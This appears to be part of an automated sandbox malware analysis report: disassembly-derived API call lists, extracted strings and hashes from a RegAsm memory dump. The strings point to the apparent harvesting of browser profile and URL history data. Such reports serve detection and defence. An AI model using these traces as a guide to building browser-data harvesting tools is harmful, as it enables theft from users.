                                                                                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                              • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                              • API String ID: 2787044678-1921111777
                                                                                                                                              • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                              • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                              • GetDC.USER32 ref: 004140E3
                                                                                                                                              • wcslen.MSVCRT ref: 00414123
                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                                                              • API String ID: 2080319088-3046471546
                                                                                                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                              APIs
                                                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                              Strings
                                                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 829165378-0
                                                                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                              • API String ID: 3143752011-1996832678
                                                                                                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                              • API String ID: 1607361635-601624466
                                                                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1043902810-0
                                                                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                              • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                              • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                              APIs
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                                                              • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                              • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                              • memcmp.MSVCRT ref: 004092D9
                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                              • memcmp.MSVCRT ref: 0040933B
                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                              • memcmp.MSVCRT ref: 00409411
                                                                                                                                              • memcmp.MSVCRT ref: 00409429
                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                              • memcmp.MSVCRT ref: 004094AC
                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                              • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                              • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
